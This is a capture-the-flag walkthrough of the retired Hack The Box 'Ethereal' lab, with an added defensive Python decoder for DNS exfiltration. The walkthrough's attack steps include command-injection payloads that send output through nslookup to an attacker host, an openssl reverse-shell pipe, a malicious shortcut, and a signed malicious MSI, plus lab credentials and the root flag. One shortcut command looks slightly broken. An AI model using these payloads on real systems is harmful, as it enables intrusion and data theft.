HTB – Ethereal

Today we are going to solve another CTF challenge, "Ethereal". It is a retired vulnerable lab presented by Hack The Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Insane

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The target IP is 10.10.10.106.

Walkthrough

Let’s start off with scanning the network to find our target.

root@kali:~/htb/ethereal# nmap -sC -sV -oA nmap 10.10.10.106
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 13:49 EDT
Nmap scan report for ethereal.htb (10.10.10.106)
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=ethereal.htb
| http-server-header: 
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.80 seconds

1. Log in to FTP with the anonymous account. The FDISK.zip archive is there; switch the transfer mode to binary before downloading, otherwise the download often fails because of network factors.

root@kali:~/htb/ethereal# wget --no-passive-ftp -m ftp://anonymous:anonymous@10.10.10.106
Ftp server

2. Unzip FDISK.zip to get an image file. The file command identifies it as a FAT-format disk. Mount it with mount -t vfat /root/FDISK /mnt/htbdisk and extract the two files pbox.dat and pbox.exe. Running pbox.exe in a Windows XP virtual machine shows that it is a 16-bit application and cannot run directly.

Pbox.exe

3. A 16-bit program emulator for Win32 is easy to find; DOSBox is currently the most famous one, and many arcade games such as Prince of Persia and tank wars run in it. At first, running pbox in it hangs.

4. This may be a version compatibility issue. Fortunately, DOSBox can be installed in the Kali environment (apt-get install dosbox), but because of DOS protected mode an error similar to "no DPMI - Get csdpmi*b.zip" may be reported. A solution is described at: https://www.linuxtopia.org/online_books/linux_tool_guides/the_sed_faq/sedfaq5_004.html The core of the fix is to download CWSDPMI.EXE and put it in the pbox.exe directory; pbox.exe then runs normally.

5. The password to enter is password. Once inside, it is a database: click the corresponding table entry to see its contents, from which a bunch of user names and passwords can be exported. The valid combination is:

user: alan
password: !C414m17y57r1k3s4g41n!

Pbox database

6. The obtained username and password can be used to log in to port 8080. This is a Test Connection page; given the Ping Address prompt, it is not hard to guess that this is a command injection vulnerability.

8080 port login

7. The problem that needs to be solved is how to see the command output. In a Linux environment ping -p is commonly used, but the Windows ping command has no -p option, so the only thing that can be used is the nslookup command, combined with the tokens parameter of a cmd for /f loop to feed the command's result back line by line. For example, to see the second field (column) of the netstat -ano result, that is, all IP and port results, the command entered on the web page is:

127.0.0.1 | for /f "tokens=2" %I in ('netstat -ano') do nslookup %I 10.10.8.20

The for /f loop body is explained at https://www.youtube.com/watch?v=jMS6LkMdAHI
Note that the tokens parameter can be cascaded. For example, to see fields 1 to 6 of the result, add tokens=1,2,3,4,5,6 and the corresponding placeholders %a.%b.%c.%d.%e.%f, as follows:
127.0.0.1 | for /f "tokens=1,2,3,4,5,6" %a in ('type c:\xxxxx.txt') do nslookup %a.%b.%c.%d.%e.%f 10.10.8.8
With the command injection executed on the web page, start tcpdump or Wireshark and filter on dns to see the command output (below: running tasklist; because nslookup fails to resolve the name it performs two queries, so the results are repeated).

Wireshark capture results

8. Enumerate the firewall rules. netsh advfirewall firewall show rule name=all is the command to view the Windows firewall rules, but it cannot be executed normally in the RCE environment, so you need to find a writable path, dump the results into a file, and then retrieve the content with type. Usually the c:\users\public directory is the path with the lowest privilege requirement, but a direct write there fails. Using the icacls command to enumerate directory permissions, it turns out that the current user alan can write to C:\users\public\desktop\Shortcuts\. The firewall configuration is finally read: only TCP ports 73 and 136 are allowed to communicate.
Enumerating permissions:

On the ping page, I tried to run 'netsh advfirewall firewall show rule name=all', but piping that to nslookup always crashes the web page, so I did the following instead:

127.0.0.1 & netsh advfirewall firewall show rule name=all|findstr "Rule Name:"|findstr "Allow" > C:\users\public\desktop\shortcuts\firewall.rulename.allow

This generates a file called firewall.rulename.allow, stored in a subfolder under public that Ethereal\Alan has write access to.
Now we read the file using the method above, displaying the firewall rule names:

127.0.0.1 & for /f "tokens=1,2,3,4,5,6,7,8" %a in ('type c:\users\public\desktop\shortcuts\firewall.rulename.allow') do nslookup %a.%b.%c.%d.%e.%f.%g.%h 10.10.14.20

result:

root@kali:~/htb/ethereal# responder -I tun0
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.20]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.UDP.Port.53
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.Port.80.8080
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
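As an added defender-side example (not part of the original writeup), the following Python decodes the nslookup channel used in steps 7 and 8 from the resolver's point of view: it parses Responder-style DNS log lines (a constructed sample modelled on the output above), reverses the for /f tokens encoding back into whitespace-separated fields, and flags a source that sends many distinct non-corporate names to one resolver. The log format, the ".a.a" padding labels, the allowed zone and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample, modelled on the Responder output format shown in this writeup.
SAMPLE_LOG = """\
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.Port.80.8080
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: Windows.a.a
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: Users.a.a
[*] [DNS] Poisoned answer sent to: 10.10.10.192 Requested name: www.example.com
"""

LINE_RE = re.compile(r"sent to: (\S+) Requested name: (\S+)")


def parse_queries(log_text):
    """Return (source_ip, queried_name) pairs from Responder-style DNS log lines."""
    return [m.groups() for m in (LINE_RE.search(l) for l in log_text.splitlines()) if m]


def decode_tokens(name, padding=".a.a"):
    """Reverse the 'for /f tokens=... do nslookup %a.%b...' encoding: each DNS label
    is one whitespace-separated field of the original output line. Fields that
    themselves contain dots (IP addresses, file names) are ambiguous and cannot be
    recovered exactly; the assumed '.a.a' padding (as in the dir command) is stripped."""
    if padding and name.endswith(padding):
        name = name[: -len(padding)]
    return " ".join(label for label in name.split(".") if label)


def find_exfil(queries, min_distinct=3, allowed_suffixes=(".example.com",)):
    """Flag sources that send at least min_distinct distinct names outside the
    allowed zones to this resolver; return their decoded lines in arrival order."""
    per_src = defaultdict(list)
    for src, name in queries:
        if name.lower().endswith(allowed_suffixes):
            continue  # ordinary corporate lookups are not interesting
        if name not in per_src[src]:
            per_src[src].append(name)  # nslookup repeats each query; keep one copy
    return {src: [decode_tokens(n) for n in names]
            for src, names in per_src.items() if len(names) >= min_distinct}
```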

9. Continue to search the system for clues. Use dir to go through the C drive; eventually OpenSSL v1.1.0 is found installed in the C:\Program Files (x86) directory, and we will use it to obtain a shell.
A command that displays a more complete dir result:

127.0.0.1 & cmd.exe /V /C "for /f " delims= " %e in ('DIR /B C:\') do cmd /c nslookup -querytype=A %e.a.a 10.10.14.20"

10. The client/server mode of openssl is not familiar to me, so first build a simulation environment locally. The official site https://www.openssl.org documents the command parameters and offers the source code, but there is no installation package. Installers for each version can be downloaded from http://slproweb.com/products/Win32OpenSSL.html . The installation is just Next all the way through.

Openssl for windows

11. On the Kali side, first set up the openssl server. You need a private key and a certificate, so run the command:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Then some certificate information needs to be filled in; fill it in freely, only the format matters, such as the e-mail address and the two-letter country code.
For questions about the command parameters, refer to the IBM documentation:
https://www.ibm.com/support/knowledgecenter/en/SSWHYP_4.0.0/com.ibm.apimgmt.cmc.doc/task_apionprem_gernerate_self_signed_openSSL.html

Generate certificate

12. Using openssl's s_client to connect to the server, testing in the simulation environment shows that openssl works somewhat like nc without the -e option: what you type is displayed on the other side, but no command can be executed. The idea is to use the pipe character to redirect input and output, that is, redirect one openssl connection into cmd.exe through "|", and then pipe the command result into a second openssl connection through another "|". In short:
openssl s_client 1 ---> input | cmd.exe | openssl s_client 2 ---> output
This is why the firewall rules need to open two ports.
The RCE command entered on the web side is:

127.0.0.1 & START "" cmd /c "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd.exe |C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:136"
Note that against the actual target we have to open two terminals at the same time, one openssl server on 73 and another openssl server on 136. The server listening commands are:
openssl s_server -quiet -key key.pem -cert cert.pem -port 73
openssl s_server -quiet -key key.pem -cert cert.pem -port 136
I type a command in the port 73 terminal and press Enter, then submit the above RCE command on the web side to push the input into the pipeline, and view the result in the port 136 terminal.
13. After getting a low-privileged shell, we find the next hint in the c:\users\alan\Desktop path. It tells us that there is a VS shortcut in the Public Desktop path; let us use it.
Clue file

14. Create a malicious lnk shortcut with PowerShell:

PS C:\Users\jacco> $WScript = New-Object -ComObject 'wscript.shell'
PS C:\Users\jacco> $SC = $WScript.CreateShortcut('Puckie.lnk')
PS C:\Users\jacco> $SC


FullName : C:\Users\jacco\Puckie.lnk
Arguments :
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath :
WindowStyle : 1
WorkingDirectory :

PS C:\pentest> $SC.TargetPath="C:\windows\system32\cmd.exe"
PS C:\pentest> $SC.Arguments="/c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd c:\progra~2\openssl-v1.1.0/bin\openssl.exe s_client -connect 10.10.14.20:136"
PS C:\Users\jacco> $SC

FullName : C:\Users\jacco\Puckie.lnk
Arguments : /c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd
c:\progra~2\openssl-v1.1.0/bin\openssl.exe s_client -connect 10.10.14.20:136
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath : C:\Windows\System32\cmd.exe
WindowStyle : 1
WorkingDirectory :

PS C:\Users\jacco> $SC.Save()
PS C:\Users\jacco> dir C:\users\jacco\*.lnk

Directory: C:\users\jacco

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2019 7:39 PM 1219 Puckie.lnk

The malicious shortcut is shown below; the commands to be executed can be seen in the shortcut's Target field.

15. Upload the malicious shortcut and overwrite c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk. Note that uploading a .lnk file directly may fail; it can be renamed with a .txt suffix for the upload. The upload also uses the pipeline, but the original connection must be disconnected first.

Kali run: openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < malicious.txt
Web run: 10.10.14.20|C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 > c:\users\public\desktop\shortcuts\out.txt (note that the suffix is changed after the upload succeeds)
Re-establish the shell connection
Shell run: del "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & copy "c:\users\public\desktop\shortcuts\out.lnk" "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk"

16. Soon a new shell arrives. In this shell there is no need to rely on the web page: type directly into port 73 and view the results on 136, and the operation is smooth. user.txt is on the jorge user's desktop.
User.txt

17. Continue searching. There are two suspicious folders on the D drive: one is Certs, which contains certificate files, and the other is DEV, which holds another clue file. This clue is easy to understand: as long as a malicious msi installation package is generated and placed in this path, the rupal user will run it; combined with the certificate files, this probably means generating a signed msi.

Clue file 2

18. Certificate files printed directly with type are garbled and cannot be copied. At present we have no download channel, so I thought of using openssl's base64 function to print the content; the commands are as follows:
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.cer
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.pvk
Copy the base64-encoded text to Kali and restore it with base64 -d.

Obtain a certificate

19. Generate the msi. We use the graphical interface of EMCO MSI Package Builder: first create a new project, then click Custom Actions, right-click and choose New Pre-Post Action, fill in the key parameters, and create the MSI package. (The password is left blank.)

Malicious msi generation

20. Sign the msi with the downloaded certificate. This requires .NET Framework 4 and the Windows SDK, which can be downloaded at:
.NET Framework 4: https://www.microsoft.com/en-us/download/details.aspx?id=17851
winsdk: https://www.microsoft.com/en-us/download/confirmation.aspx?id=8279
Once installed, you can start signing. The commands are as follows:
makecert -n "CN=Ethereal" -pe -cy end -ic C:\MyCA.cer -iv C:\MyCA.pvk -sky signature -sv C:\hack.pvk C:\hack.cer
pvk2pfx -pvk C:\hack.pvk -spc C:\hack.cer -pfx C:\hack.pfx
signtool sign /f C:\hack.pfx C:\shell.msi
If the signature is successful, you can see the following prompt:

Successful signature

21. Upload the signed msi to d:\dev\msis\shell.msi, then exit the two openssl connections on 73 and 136 and listen again. In about 1 minute the rupal user's shell comes online. Read root.txt in his Desktop path:

1cb6f1fc220e3f2fcc0e3cd8e2d9906f

22. If the deployment of the msi is not successful, you have to try a second time, and you must regenerate an msi, sign it and upload it again, because an msi that has already been installed is registered in the system and will not run again. They can be seen in Add/Remove Programs in the Control Panel, but in this environment we have no way to uninstall the previously installed msi.

Author : Jacco Straathof